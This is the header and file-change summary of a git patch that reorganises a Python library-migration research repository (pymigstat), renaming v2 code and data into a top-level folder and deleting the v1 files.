From 864f9197078674e2fe9419c33b6b3f416a4667a6 Mon Sep 17 00:00:00 2001 From: Mohayemin Date: Mon, 29 Jan 2024 11:11:18 -0700 Subject: [PATCH] keep the latest version of script and data in the repo. Point to the release for the old version --- README.md | 29 +- {v2/code => code}/.gitignore | 0 {v2/code => code}/LICENSE | 0 {v2/code => code}/configs/config.yaml | 0 {v1/code/core => code/pymigstat}/__init__.py | 0 .../pymigstat/code_change_search}/__init__.py | 0 .../code_change_search/diff_meta_parser.py | 0 .../code_change_search/find_code_changes.py | 0 .../code_change_search/usage_resolver.py | 0 .../pymigstat/complexity/__init__.py | 0 .../pymigstat/complexity/max_cardinality.py | 0 .../complexity/mfiles_migration_complexity.py | 0 .../pymigstat/complexity/mig_loc.py | 0 .../pymigstat/complexity/migration_metric.py | 0 .../pymigstat/complexity/num_apis.py | 0 .../pymigstat/complexity/num_changes.py | 0 .../pymigstat/complexity/pe_set.py | 0 .../pymigstat/complexity/prop_set.py | 0 .../pymigstat/complexity/unique_apis.py | 0 .../pymigstat/complexity/unique_mappings.py | 0 {v2/code => code}/pymigstat/config.py | 0 .../pymigstat/core}/__init__.py | 0 .../pymigstat/core/import_statement_finder.py | 0 .../pymigstat/core/pypi_cache.py | 0 {v2/code => code}/pymigstat/csv_helper.py | 0 .../pymigstat/datamodels}/__init__.py | 0 .../pymigstat/datamodels/api_mapping.py | 0 .../pymigstat/datamodels/data_reader.py | 0 .../pymigstat/datamodels/datamodel.py | 0 .../pymigstat/datamodels/loaders.py | 0 .../pymigstat/datamodels/migration.py | 0 .../pymigstat/datamodels/storage.py | 0 .../core => code/pymigstat/latex}/__init__.py | 0 {v2/code => code}/pymigstat/latex/core.py | 0 {v2/code => code}/pymigstat/latex/graphics.py | 0 {v2/code => code}/pymigstat/latex/tables.py | 0 {v2/code => code}/pymigstat/latex/utils.py | 0 {v2/code => code}/pymigstat/pymigstat.py | 0 .../pymigstat/reports/__init__.py | 0 .../pymigstat/reports/api_mapping_data.py | 0 .../pymigstat/reports/api_mapping_stats.py | 0 .../reports/big_combination_stats.py | 0 .../pymigstat/reports/cardinality_stat.py | 0 .../pymigstat/reports/code_change_summary.py | 0 .../pymigstat/reports/data_stats.py | 0 .../pymigstat/reports/export_constant_data.py | 0 .../pymigstat/reports/lib_pair_data.py | 0 .../pymigstat/reports/lib_pair_stats.py | 0 .../pymigstat/reports/mig_effort_stats.py | 0 .../pymigstat/reports/migration_summary.py | 0 {v2/code => code}/pymigstat/reports/misc.py | 0 .../reports/signature_change_stat.py | 0 .../pymigstat/reports/update_report_data.py | 0 .../pymigstat/runnables}/__init__.py | 0 .../runnables/clean_up_data_files.py | 0 .../runnables/convert_pymigbench_data.py | 0 .../pymigstat/runnables/download_repos.py | 0 .../runnables/filter_migration_data.py | 0 .../runnables/find_all_code_changes.py | 0 ...ple_migrations_for_code_change_labeling.py | 0 .../pymigstat/taxonomy}/__init__.py | 0 .../pymigstat/taxonomy/agreement_rate.py | 0 .../taxonomy/agreement_rate_round_1.py | 0 .../pymigstat/taxonomy/combine_rounds.py | 0 .../pymigstat/taxonomy/constants.py | 0 .../pymigstat/taxonomy/export_yaml.py | 0 .../pymigstat/taxonomy/generate_taxonomy.py | 0 .../pymigstat/taxonomy/merge_labellings.py | 0 .../taxonomy/merge_labellings_round_1.py | 0 {v2/code => code}/pymigstat/tools/__init__.py | 0 .../pymigstat/tools/external_tool.py | 0 .../pymigstat/tools/git_repo_wrapper.py | 0 {v2/code => code}/pymigstat/utils/__init__.py | 0 .../pymigstat/utils/gpt_client.py | 0 {v2/code => code}/pymigstat/utils/progress.py | 0 {v2/code => code}/pymigstat/utils/utils.py | 0 {v2/code => code}/report/code-changes.csv | 0 {v2/code => code}/report/combined-ccs-raw.csv | 0 {v2/code => code}/report/data-stats.csv | 0 {v2/code => code}/report/effort.csv | 0 .../migration-combination--with-fc-groups.csv | 0 .../report/migration-combination.csv | 0 {v2/code => code}/report/migrations.csv | 0 .../report/taxonomy-stat-table.csv | 0 {v2/code => code}/requirements.txt | 0 .../taxonomy-data/round1--merge.csv | 0 .../taxonomy-data/round1-ajay.csv | 0 .../taxonomy-data/round1-ildar.csv | 0 .../taxonomy-data/round1-moha.csv | 0 .../taxonomy-data/round1-sarah.csv | 0 .../taxonomy-data/round2--merge.csv | 0 .../taxonomy-data/round2-ajay.csv | 0 .../taxonomy-data/round2-ildar.csv | 0 .../taxonomy-data/round2-moha.csv | 0 .../taxonomy-data/round2-sarah.csv | 0 .../taxonomy-data/round3--merge.csv | 0 .../taxonomy-data/round3-ajay.csv | 0 .../taxonomy-data/round3-ildar.csv | 0 .../taxonomy-data/round3-moha.csv | 0 .../taxonomy-data/round3-sarah.csv | 0 ...tzkvn@python-http-monitoring__790a483.yaml | 0 ...ttp__httpx__sk-415@harukabot__0611d16.yaml | 0 ...ttpx__snwmds@polemicbooksapi__69df530.yaml | 0 ...chalddave@segment-any-moving__87160d0.yaml | 0 ..._click__adithyabsk@keep2roam__d340eea.yaml | 0 ...__click__amesar@mlflow-tools__431737a.yaml | 0 ...__ansible-community@molecule__b7d7740.yaml | 0 ...arse__click__clearmatics@ion__03fb3a3.yaml | 0 ...arse__click__godaddy@tartufo__553dc5f.yaml | 0 ...samples@assistant-sdk-python__38e4e64.yaml | 0 ...gparse__click__grahame@sedge__3badf07.yaml | 0 ...argparse__click__himkt@pyner__76106a9.yaml | 0 ...arse__click__klensy@wt-tools__760ff36.yaml | 0 ...se__click__kxr@o-must-gather__9da4722.yaml | 0 .../argparse__click__lqez@hog__d722ade.yaml | 0 ...lick__magnetotesting@magneto__a5c82b8.yaml | 0 ...rse__click__martinthoma@hwrt__86bc433.yaml | 0 ..._click__oca@maintainer-tools__69593ae.yaml | 0 ...yyin@google-translate-python__ac375b4.yaml | 0 ...ick__yubico@yubioath-desktop__9d601b4.yaml | 0 ...rgparse__rocketmap@rocketmap__2960ec6.yaml | 0 ...rse__docopt__ceph@teuthology__fb32105.yaml | 0 ..._hootnot@oandapyv20-examples__e1df70e.yaml | 0 ...arse__docopt__tankerhq@tbump__54b12e2.yaml | 0 ...edis__aioredis__augerai@a2ml__13ea499.yaml | 0 ...s__aioredis__eyepea@api-hour__97286ef.yaml | 0 ...__dataclasses__aiortc@aiortc__270edaf.yaml | 0 ...ataclasses__keepsafe@aiohttp__e51fb1f.yaml | 0 ...alice-assistant@projectalice__f1fe8cb.yaml | 0 ...imonlindholm@decomp-permuter__cfbb706.yaml | 0 ...ib__twiliodeved@sms2fa-flask__22eedfc.yaml | 0 ...oup__bs4__cfpb@cfgov-refresh__3262610.yaml | 0 ..._boto__whoopinc@mkwheelhouse__54806ff.yaml | 0 ...otocore__boto__zalando@spilo__a83681c.yaml | 0 ...__flask__cqmoe@python-cqhttp__f9f083e.yaml | 0 ...bottle__flask__heyman@locust__4067b92.yaml | 0 ...__flask__nicolas-van@pygreen__843c8cf.yaml | 0 ...ch__munch__1and1@confluencer__df895ac.yaml | 0 ...__fedora-infra@python-fedora__aca2a20.yaml | 0 ...ery__rq__sapfir0@premier-eye__a7375cc.yaml | 0 ...tic__attrs__rackerlabs@mimic__5bb4946.yaml | 0 ...cchardet__emlid@ntripbrowser__9161c19.yaml | 0 ...h3__jinja2__openstack@ironic__cbf214b.yaml | 0 ...tah3__jinja2__shingetsu@saku__d1ad50a.yaml | 0 ...etah__jinja2__shingetsu@saku__d1ad50a.yaml | 0 ...ttenparry@meituri-downloader__422d73b.yaml | 0 ..._argparse__neurostuff@nimare__2b80aa2.yaml | 0 ...ick__argparse__nodepy@nodepy__715142c.yaml | 0 ...__argparse__titusz@onixcheck__f17d186.yaml | 0 ...me__danielyule@hearthbreaker__d018edf.yaml | 0 ...obj__ctlearn-project@ctlearn__2375af8.yaml | 0 ...rser__configobj__dbcli@mycli__b7a0b0f.yaml | 0 ...v__ckan@ckanext-datapackager__a6a3fb3.yaml | 0 ...v__unicodecsv__codesy@codesy__b5824f4.yaml | 0 ...ecsv__heroku@salesforce-bulk__2f787fa.yaml | 0 ...odecsv__mlsecproject@combine__efe20ac.yaml | 0 ...v__unicodecsv__praekelt@molo__567b66f.yaml | 0 ...codecsv__radremedy@radremedy__8fa9b7f.yaml | 0 ...v__unicodecsv__shoopio@shoop__639e3b5.yaml | 0 ...epy__thombashi@datetimerange__936761f.yaml | 0 ...ypepy__thombashi@pingparsing__45fac3c.yaml | 0 ...ypepy__thombashi@sqlitebiter__26c8e74.yaml | 0 ...oudpickle__blaze@distributed__6dc1f3f.yaml | 0 ...of-systems-laboratory@beluga__078e3e5.yaml | 0 ...__drf-yasg__bcgov@theorgbook__728f86e.yaml | 0 ...-yasg__opengisch@qfieldcloud__4377d67.yaml | 0 .../django__utils__rq@django-rq__310ac1d.yaml | 0 ...t__argparse__aio-libs@aioftp__ba6ef08.yaml | 0 ...parse__deepspace2@styleframe__ffc8d76.yaml | 0 ...copt__argparse__mete0r@pyhwp__0c5c5e7.yaml | 0 ...click__michaeljoseph@changes__d9a8fae.yaml | 0 ..._pynacl__romanz@trezor-agent__e1bbdb4.yaml | 0 ...incetonuniversity@psyneulink__5253a55.yaml | 0 ...ls__omisego@plasma-contracts__fc4ac19.yaml | 0 ...tlet__gevent__c00w@bithopper__6612526.yaml | 0 ...t__gevent__noisyboiler@wampy__f87f7be.yaml | 0 ...let__gevent__phuks-co@throat__9a28960.yaml | 0 ...tlet__gevent__stefal@rtkbase__a4c347a.yaml | 0 ...abric3__invoke__skoczen@will__437f8be.yaml | 0 ...ko__mirantis@openstack-lbaas__d7440d4.yaml | 0 ...sk-restplus__kizniche@mycodo__047263b.yaml | 0 ...testdrivenio@flask-react-aws__d4119a0.yaml | 0 ...sk-restplus__ziirish@burp-ui__8ef3b62.yaml | 0 ...sk-restx__apryor6@flaskerize__59d8319.yaml | 0 ...flask-restx__kizniche@mycodo__5169173.yaml | 0 ...flask-restx__orchest@orchest__6b629d0.yaml | 0 ...egrator@pythondataintegrator__598f275.yaml | 0 ..._bottle__arosenfeld@immunedb__6141b13.yaml | 0 ...pi__bretttolbert@verbecc-svc__24a848d.yaml | 0 ...fastapi__virtuber@openvtuber__3abbc43.yaml | 0 ..._elblogbruno@notionai-mymind__002f5bd.yaml | 0 ..._quart__intel@stacks-usecase__22cc3f0.yaml | 0 ...gorchestra@learningorchestra__db7f132.yaml | 0 ...es@faster_than_flask_article__0a70f2b.yaml | 0 ...art__synesthesiam@voice2json__7ea7ddb.yaml | 0 ...ync-techniques-python-course__aa607bd.yaml | 0 ..._tornado__krischer@instaseis__13c26a6.yaml | 0 ...uvicorn__virtuber@openvtuber__3abbc43.yaml | 0 ...__rapidfuzz__nlpia@nlpia-bot__054d5d2.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__45d94dd.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__963f347.yaml | 0 ...__aiohttp__talkiq@gcloud-aio__d15540f.yaml | 0 ...ecloudplatform@gcloud-python__e55a1d8.yaml | 0 .../gcloud__google__wal-e@wal-e__be9820b.yaml | 0 ...ntlet__duanhongyi@dwebsocket__d707ff6.yaml | 0 ...iguelgrinberg@flask-socketio__883e73e.yaml | 0 ...ventlet__projectcalico@felix__657e727.yaml | 0 ...nt__eventlet__stefal@rtkbase__cf856c0.yaml | 0 ..._eventlet__thenetcircle@dino__119d922.yaml | 0 ...itress__openphilology@nidaba__4bab2ee.yaml | 0 ...x-rtd-theme__jamesls@semidbm__aa0baba.yaml | 0 ...ml5lib__bleach__posativ@isso__f1a4478.yaml | 0 ...tml5lib__bleach__pycon@pycon__3dba963.yaml | 0 ...b2__requests__ankitects@anki__f6245cd.yaml | 0 ...2__requests__cpfair@tapiriik__495db93.yaml | 0 ...ests__hasgeek@flask-lastuser__6114ad5.yaml | 0 ...pe-storage@python-3parclient__75b94d3.yaml | 0 ...equests__jarodl@flask-github__341c769.yaml | 0 ...b2__requests__jgorset@facepy__89ba1d4.yaml | 0 ...quests__openshot@openshot-qt__4349753.yaml | 0 ...requests__openstack@deb-nova__346d941.yaml | 0 ...__openstack@networking-cisco__075010a.yaml | 0 ...equests__wikimedia@pywikibot__952665a.yaml | 0 ...crapinghub-entrypoint-scrapy__80b2262.yaml | 0 ...y-plugins@scrapy-pagestorage__ce31d53.yaml | 0 ...lery__lonelam@onlinejudgeshu__b687d20.yaml | 0 ...r__ipaddress__google@capirca__eb768ea.yaml | 0 ...dr__ipaddress__reannz@faucet__4a23ef8.yaml | 0 ...dr__ipaddress__rvojcik@rtapi__2c25c05.yaml | 0 ...ddr__openstack@deb-designate__eb16b1e.yaml | 0 ...taddr__openstack@fuel-devops__5d0df07.yaml | 0 ...ddr__netaddr__openstack@wsme__002473c.yaml | 0 ...__py2-ipaddress__evgeni@bley__dcc4285.yaml | 0 ...-ipaddress__jdswinbank@comet__1549e86.yaml | 0 ...agic-wormhole@magic-wormhole__5b23669.yaml | 0 ...2-ipaddress__meejah@txtorcon__c8fdba0.yaml | 0 ...address__redhat-cip@hardware__a429c38.yaml | 0 ...py2-ipaddress__rvojcik@rtapi__2c25c05.yaml | 0 ...y2-ipaddress__stackstorm@st2__4022aea.yaml | 0 ...dr__napalm-automation@napalm__085994a.yaml | 0 ...t__hxlstandard@libhxl-python__0babff2.yaml | 0 ...nlessdata@tableschema-sql-py__a1385f7.yaml | 0 ...nt-kafka__biznetgio@restknot__6b10345.yaml | 0 ...ka__openstack@oslo.messaging__5a842ae.yaml | 0 ...__svenskaspel@locust-plugins__fad53da.yaml | 0 ...ldb__plyvel__ethereum@py-evm__5c273ff.yaml | 0 ...db__plyvel__gdassori@spruned__4326c64.yaml | 0 ..._obsidianforensics@hindsight__973b3d3.yaml | 0 ...__fasteners__kizniche@mycodo__547f6d9.yaml | 0 ...teners__paratoolsinc@taucmdr__2a2c28a.yaml | 0 ...asteners__samschott@maestral__e4388ee.yaml | 0 ...oguru__thombashi@sqlitebiter__311c7ce.yaml | 0 ...__loguru__thombashi@tcconfig__7ba8676.yaml | 0 ...ogging__prtg@pythonminiprobe__2b6a1ae.yaml | 0 ...__defusedxml__haiwen@seafdav__5e1291f.yaml | 0 ...envinotoolkit@open_model_zoo__7c2529f.yaml | 0 ...l__defusedxml__synacktiv@eos__ac9596f.yaml | 0 ...ptography__kevoreilly@capev2__abf58a7.yaml | 0 ..._yubico@python-u2flib-server__65c4665.yaml | 0 ...gecarleitao@public-contracts__70a229c.yaml | 0 ...ic__kickstandproject@payload__ffeff6a.yaml | 0 ...els__model__hwwang55@gcn-lpa__7a97486.yaml | 0 ...__crossbario@autobahn-python__9e00896.yaml | 0 ...ython__kushalp@serfclient-py__3adbf0f.yaml | 0 ...sing__axelrod-python@axelrod__70f3a35.yaml | 0 ...rocessing__intelpni@brainiak__e62dc1d.yaml | 0 ...essing__markovmodel@msmtools__a3a152e.yaml | 0 ...s__czheo@syntax_sugar_python__1dbc1d4.yaml | 0 ...tiprocess__jhsmit@colicoords__a082ad5.yaml | 0 ...se__napalm__afourmy@e-napalm__1033665.yaml | 0 ...taddr__ipaddress__ovirt@vdsm__6eef802.yaml | 0 ...@django-postgresql-netfields__a5a1118.yaml | 0 ...s__nitmir@policyd-rate-limit__c024e06.yaml | 0 ...openstack@networking-bagpipe__4bb14fa.yaml | 0 ...penstack@networking-fortinet__2365dcb.yaml | 0 ...ck@networking-generic-switch__c6f4b71.yaml | 0 ...ib__openstack@networking-nec__ff1695d.yaml | 0 ...ib__openstack@networking-odl__a40b9d9.yaml | 0 ...tic-version__openstack@solar__8766f11.yaml | 0 ...hlib__discogs@discogs_client__c56f61a.yaml | 0 ...xl__xlsxwriter__bcgov@gwells__57d12c4.yaml | 0 ...thon-ironic-inspector-client__c25d73e.yaml | 0 ...tack@deb-python-muranoclient__e3a2b68.yaml | 0 ...ack@python-searchlightclient__0bc93d1.yaml | 0 ...ric__aws@aws-parallelcluster__d49460a.yaml | 0 ...yle__cyberbotics@urdf2webots__723168d.yaml | 0 ...style__fabioz@PyDev.Debugger__d535c19.yaml | 0 ...pycodestyle__hhatto@autopep8__3e1c196.yaml | 0 ...odestyle__nchammas@flintrock__7323298.yaml | 0 ...destyle__openstack@designate__2c9e9f5.yaml | 0 ...ycodestyle__openstack@sahara__61b0b2e.yaml | 0 ...estyle__schlamar@flake8-todo__fcd59c6.yaml | 0 ...ow__rcos@observatory-retired__f970b54.yaml | 0 ...pil__pillow__shoebot@shoebot__0171fb9.yaml | 0 ...ucationaltestingservice@skll__f870a65.yaml | 0 ...ar__tqdm__ozencb@yts-scraper__383401a.yaml | 0 ...ssbar__tqdm__redkyn@assigner__f132d03.yaml | 0 ...qdm__rivuletstudio@rivuletpy__52068ad.yaml | 0 ...gressbar__tqdm__wkentaro@fcn__399069a.yaml | 0 ...crypt__bcrypt__weasyl@weasyl__f6230c7.yaml | 0 ...pypandoc__hustlzp@permission__d174a21.yaml | 0 ...phy__freeopcua@opcua-asyncio__cdaff15.yaml | 0 ...ome__camptocamp@c2cgeoportal__14388c3.yaml | 0 ...__pycryptodome__hhyo@archery__e192ca6.yaml | 0 ...eling@cookiecutter-pypackage__8d172cb.yaml | 0 ...ryptography__apache@libcloud__a68022d.yaml | 0 ...ography__cloudve@cloudbridge__27b217e.yaml | 0 ...tography__coresecurity@pysap__21fe13a.yaml | 0 ...tography__jvanovost@dc09_spt__08a9d0b.yaml | 0 ...ography__leifj@pyxmlsecurity__b5d88c8.yaml | 0 ...raphy__mitya57@secretstorage__e637c3b.yaml | 0 ...hy__ojarva@python-sshpubkeys__e3ee2d2.yaml | 0 ...yptography__openstack@glance__5ebde90.yaml | 0 ...openstack@keystonemiddleware__e23cb36.yaml | 0 ...phy__privacyidea@privacyidea__bcd8a45.yaml | 0 ...__cryptography__rev112@pyope__48c294a.yaml | 0 ...__cryptography__secdev@scapy__c24298b.yaml | 0 ...ography__spockbotmc@spockbot__4442170.yaml | 0 ...raphy__tgalal@python-axolotl__f74a936.yaml | 0 ...ryptography__twisted@twisted__e31995c.yaml | 0 ...e__pycryptodomex__azure@aztk__19dde42.yaml | 0 ...ryptodomex__malwaredllc@byob__9291b54.yaml | 0 ...mex__snemes@malware-analysis__02b064b.yaml | 0 ...uests__tasmota@decode-config__5be6141.yaml | 0 ...quests__upstox@upstox-python__dce8760.yaml | 0 ...s__pydot2__networkx@networkx__481f3e8.yaml | 0 ...plus__pydot2__trungdong@prov__acb9b05.yaml | 0 ...plus__pydot__mathics@mathics__915daeb.yaml | 0 ...fits__astropy__glue-viz@glue__5b2d7f9.yaml | 0 .../pyfits__astropy__icrar@ngas__fa8b714.yaml | 0 ...py__spacetelescope@pysynphot__5b80ada.yaml | 0 ...pymilvus__milvus-io@bootcamp__89c7afc.yaml | 0 ...pymilvus__milvus-io@bootcamp__a7f4c3f.yaml | 0 ...pymilvus__milvus-io@bootcamp__e5073e4.yaml | 0 ...y__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml | 0 ..._cryptography__celery@celery__9b39fc4.yaml | 0 ...phy__openstack@neutron-lbaas__bb34d71.yaml | 0 ...pcap__pcapy__openstack@steth__a981d2e.yaml | 0 ...stneuro@nwb-conversion-tools__a2ef335.yaml | 0 ...qt5__pyside2__sanpen@gridcal__39a5dd9.yaml | 0 ..._pyside6__toufool@auto-split__86244b6.yaml | 0 ...autifulsoup4__idan@telostats__f73354a.yaml | 0 ...pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml | 0 ...ud-custodian@cloud-custodian__cbaf252.yaml | 0 ...ap__ldap3__ictu@quality-time__cc47b42.yaml | 0 ...pymemcache__flan@staticdhcpd__0e64819.yaml | 0 ...s__haoxizhong@pytorch-worker__fa8de77.yaml | 0 ...rs__kaushaltrivedi@fast-bert__1c96992.yaml | 0 ...rch-transformers__naver@claf__cffe499.yaml | 0 ...sformers__tiiiger@bert_score__04376e1.yaml | 0 ...uctive-commonsense-reasoning__abfeffc.yaml | 0 ...__calclavia@story-generation__8954fad.yaml | 0 ...ce@transfer-learning-conv-ai__16074b2.yaml | 0 ...ers__intellabs@nlp-architect__9f067f2.yaml | 0 ...ansformers__jsybrandt@agatha__b570ef0.yaml | 0 ...s__transformers__nvidia@nemo__7866512.yaml | 0 ...um__oddluck@limnoria-plugins__2c40713.yaml | 0 ...um__oddluck@limnoria-plugins__33c7a3f.yaml | 0 ...activitywatch@aw-watcher-afk__297b58c.yaml | 0 ...pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml | 0 ...yaml__oyaml__gammapy@gammapy__848da63.yaml | 0 ...ud-custodian@cloud-custodian__ee4d526.yaml | 0 ...on-workflow-language@cwltool__b9b65c0.yaml | 0 ...l__ruamel.yaml__holgern@beem__f5ba90e.yaml | 0 ...aven__sentry-sdk__agdsn@sipa__ea23791.yaml | 0 ...-sdk__city-of-helsinki@respa__4fecb97.yaml | 0 ...en__sentry-sdk__etalab@udata__9bc0f73.yaml | 0 ...entry-sdk__habitissimo@myaas__0a65bcc.yaml | 0 ..._sentry-sdk__kiwicom@the-zoo__e22070c.yaml | 0 ...y-sdk__mozilla@addons-server__634c64f.yaml | 0 ...entry-sdk__onecodex@onecodex__120d961.yaml | 0 ...ainc@cfn-cross-region-export__f1120d3.yaml | 0 ...samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml | 0 ...k__teamsempo@sempoblockchain__449990a.yaml | 0 ...ective@thespaghettidetective__b86b375.yaml | 0 ...n__sentry-sdk__weasyl@weasyl__d10cb16.yaml | 0 ...nect@py-walletconnect-bridge__c2d3db2.yaml | 0 ...thlib__mozilla@addons-server__5fd17b4.yaml | 0 ...s-oauthlib__getsentry@sentry__0bfe540.yaml | 0 ...thlib__gunthercox@chatterbot__6c3b234.yaml | 0 ...oauthlib__sarumont@py-trello__ede0ceb.yaml | 0 ...ests__sybrenstuvel@flickrapi__c4f8d79.yaml | 0 ...ests__aiohttp__aiortc@aiortc__d30c240.yaml | 0 ...__aiohttp__ictu@quality-time__d3a9a16.yaml | 0 ...tp__keselekpermen69@userbutt__a2dd44e.yaml | 0 ...p__paradoxalarminterface@pai__fac6f80.yaml | 0 ...ttp__raptor123471@dingolingo__1d8923a.yaml | 0 ...ync-techniques-python-course__a5c04bb.yaml | 0 ...ync-techniques-python-course__ab4e5fd.yaml | 0 ...p__usergeteam@userge-plugins__80a5434.yaml | 0 ...s__sporteasy@python-poeditor__5710859.yaml | 0 ...elai@inference-model-manager__71aff3a.yaml | 0 ...ng__tenacity__openstack@aodh__7587ab9.yaml | 0 ...nacity__openstack@ceilometer__380bb26.yaml | 0 ...__openstack@ironic-inspector__f4648fa.yaml | 0 ...__tenacity__openstack@ironic__b0607a2.yaml | 0 ...ainc@cfn-cross-region-export__8d0ec68.yaml | 0 ...ning@push-button-stop-motion__0b6cdad.yaml | 0 ...ud-custodian@cloud-custodian__12e3e80.yaml | 0 ....yaml__pyyaml__microsoft@nni__b955ac9.yaml | 0 ...projections@covid-data-model__95385ff.yaml | 0 ...mplejson__ujson__zulip@zulip__222ef67.yaml | 0 ...dk__alice-biometrics@petisco__9abf7b1.yaml | 0 ...kapi@python-slack-events-api__813214e.yaml | 0 ...k__slackapi@python-slack-sdk__5f4d92a.yaml | 0 ...-sdk__zulip@python-zulip-api__2d9cf64.yaml | 0 ...-cffi__smbus2__pimoroni@inky__cba3651.yaml | 0 ...-sphinx-theme__edx@ecommerce__c1e120f.yaml | 0 ...-sphinx-theme__bashtage@arch__3620700.yaml | 0 ...zeep__whynothugo@django-afip__827dd9f.yaml | 0 .../suds__zeep__hbldh@pybankid__79e424c.yaml | 0 ...enstate@open-raadsinformatie__b56e481.yaml | 0 .../tables__h5py__yoseflab@scvi__35163f0.yaml | 0 ...omlkit__greenbone@python-gvm__75a11ed.yaml | 0 .../toolz__cytoolz__nlesc@xtas__0dbf388.yaml | 0 ...__asyncio__popupcad@popupcad__d0526f6.yaml | 0 ...tweepy__cloudbotirc@cloudbot__f824322.yaml | 0 ...__tweepy__huntwelch@mongobot__bea008a.yaml | 0 ...fonttools__googlefonts@cu2qu__3543e4f.yaml | 0 ...on__htrc@htrc-feature-reader__7eae68a.yaml | 0 ...json__rapidjson__kinto@kinto__951dd25.yaml | 0 ...__rapidjson__murthylab@sleap__50721de.yaml | 0 ...k__msgpack__logicaldash@lise__028d0b3.yaml | 0 ...csv__csv__cfpb@cfgov-refresh__b4beec3.yaml | 0 ...csv__csv__seed-platform@seed__119ba4b.yaml | 0 ...pathlib__studentenportal@web__4842cff.yaml | 0 ...byrnereese@uphold-sdk-python__14fd085.yaml | 0 ...quests__canonical@cloud-init__0fc887d.yaml | 0 ...__requests__finish06@pyunifi__3e53482.yaml | 0 ...ts__mixpanel@mixpanel-python__e8a9330.yaml | 0 ...hdog__pyinotify__onitu@onitu__04575c8.yaml | 0 ...ebapp2__flask__c4rlo@vimhelp__7a5fadf.yaml | 0 ...ahlia@sqlalchemy-imageattach__7cd3ca5.yaml | 0 ...requests__noaa-oar-arl@monet__590936b.yaml | 0 ...iter__openpyxl__bcgov@gwells__472f336.yaml | 0 v1/code/.gitignore | 1 - v1/code/.idea/.gitignore | 8 - v1/code/.idea/code.iml | 13 - .../inspectionProfiles/Project_Default.xml | 7 - .../inspectionProfiles/profiles_settings.xml | 6 - v1/code/.idea/misc.xml | 4 - v1/code/.idea/modules.xml | 8 - v1/code/.idea/vcs.xml | 6 - v1/code/core/Arguments.py | 49 - v1/code/core/Constants.py | 9 - v1/code/core/Factory.py | 34 - v1/code/core/to_dict.py | 16 - v1/code/db/Db.py | 61 - v1/code/db/__init__.py | 1 - v1/code/format/JSONFormat.py | 9 - v1/code/format/OutputFormat.py | 18 - v1/code/format/YAMLFormat.py | 9 - v1/code/format/__init__.py | 1 - v1/code/pymigbench.py | 23 - v1/code/query/Count.py | 12 - v1/code/query/Detail.py | 7 - v1/code/query/Listing.py | 7 - v1/code/query/Query.py | 30 - v1/code/query/Result.py | 16 - v1/code/query/Summary.py | 54 - v1/code/requirements.txt | 1 - v1/code/tests/__init__.py | 1 - v1/code/tests/misc_test.py | 33 - ...sipa__ea23791__sipa$initialization.py.diff | 58 - ..._ea23791__sipa$initialization.py.source.py | 215 -- ..._ea23791__sipa$initialization.py.target.py | 212 -- ...pplication$notifier$slack_notifier.py.diff | 65 - ...ation$notifier$slack_notifier.py.source.py | 42 - ...ation$notifier$slack_notifier.py.target.py | 60 - ...sco$extra$slack$is_slack_available.py.diff | 12 - ...xtra$slack$is_slack_available.py.source.py | 6 - ...xtra$slack$is_slack_available.py.target.py | 6 - ...nfrastructure$slack$slack_notifier.py.diff | 12 - ...tructure$slack$slack_notifier.py.source.py | 36 - ...tructure$slack$slack_notifier.py.target.py | 36 - ...rize__59d8319__flaskerize$generate.py.diff | 13 - ..._59d8319__flaskerize$generate.py.source.py | 302 -- ..._59d8319__flaskerize$generate.py.target.py | 302 -- ...me }}.template$controller.py.template.diff | 13 - ....template$controller.py.template.source.py | 57 - ....template$controller.py.template.target.py | 57 - ...s${{ name }}.template$app$__init__.py.diff | 12 - ...name }}.template$app$__init__.py.source.py | 23 - ...name }}.template$app$__init__.py.target.py | 23 - ... }}.template$app$widget$controller.py.diff | 12 - ...emplate$app$widget$controller.py.source.py | 56 - ...emplate$app$widget$controller.py.target.py | 56 - .../azure@aztk__19dde42__aztk$client.py.diff | 13 - ...re@aztk__19dde42__aztk$client.py.source.py | 401 --- ...re@aztk__19dde42__aztk$client.py.target.py | 401 --- ...k$node_scripts$install$create_user.py.diff | 15 - ...e_scripts$install$create_user.py.source.py | 55 - ...e_scripts$install$create_user.py.target.py | 55 - ..._19dde42__aztk$spark$models$models.py.diff | 11 - ...e42__aztk$spark$models$models.py.source.py | 312 -- ...e42__aztk$spark$models$models.py.target.py | 312 -- ...__19dde42__aztk$utils$secure_utils.py.diff | 14 - ...de42__aztk$utils$secure_utils.py.source.py | 18 - ...de42__aztk$utils$secure_utils.py.target.py | 18 - ...d$wells$management$commands$export.py.diff | 127 - ...ls$management$commands$export.py.source.py | 221 -- ...ls$management$commands$export.py.target.py | 228 -- ...d$wells$management$commands$export.py.diff | 101 - ...ls$management$commands$export.py.source.py | 228 -- ...ls$management$commands$export.py.target.py | 231 -- ...k__728f86e__tob-api$api_v2$swagger.py.diff | 15 - ...8f86e__tob-api$api_v2$swagger.py.source.py | 33 - ...8f86e__tob-api$api_v2$swagger.py.target.py | 35 - ...6b10345__agent$dnsagent$clis$start.py.diff | 79 - ...45__agent$dnsagent$clis$start.py.source.py | 62 - ...45__agent$dnsagent$clis$start.py.target.py | 61 - ..._6b10345__api$app$helpers$producer.py.diff | 53 - ...345__api$app$helpers$producer.py.source.py | 38 - ...345__api$app$helpers$producer.py.target.py | 44 - ..._python$verb_conjugate_fr$__init__.py.diff | 15 - ...on$verb_conjugate_fr$__init__.py.source.py | 8 - ...on$verb_conjugate_fr$__init__.py.target.py | 5 - ...al$c2cgeoportal_geoportal$__init__.py.diff | 19 - ...cgeoportal_geoportal$__init__.py.source.py | 765 ---- ...cgeoportal_geoportal$__init__.py.target.py | 769 ---- ...oportal_geoportal$scripts$urllogin.py.diff | 20 - ...al_geoportal$scripts$urllogin.py.source.py | 72 - ...al_geoportal$scripts$urllogin.py.target.py | 73 - ...0__tools$c7n_mailer$c7n_mailer$cli.py.diff | 18 - ...ols$c7n_mailer$c7n_mailer$cli.py.source.py | 257 -- ...ols$c7n_mailer$c7n_mailer$cli.py.target.py | 257 -- ...tools$c7n_mailer$c7n_mailer$replay.py.diff | 20 - ...$c7n_mailer$c7n_mailer$replay.py.source.py | 144 - ...$c7n_mailer$c7n_mailer$replay.py.target.py | 144 - ..._tools$c7n_mailer$c7n_mailer$utils.py.diff | 19 - 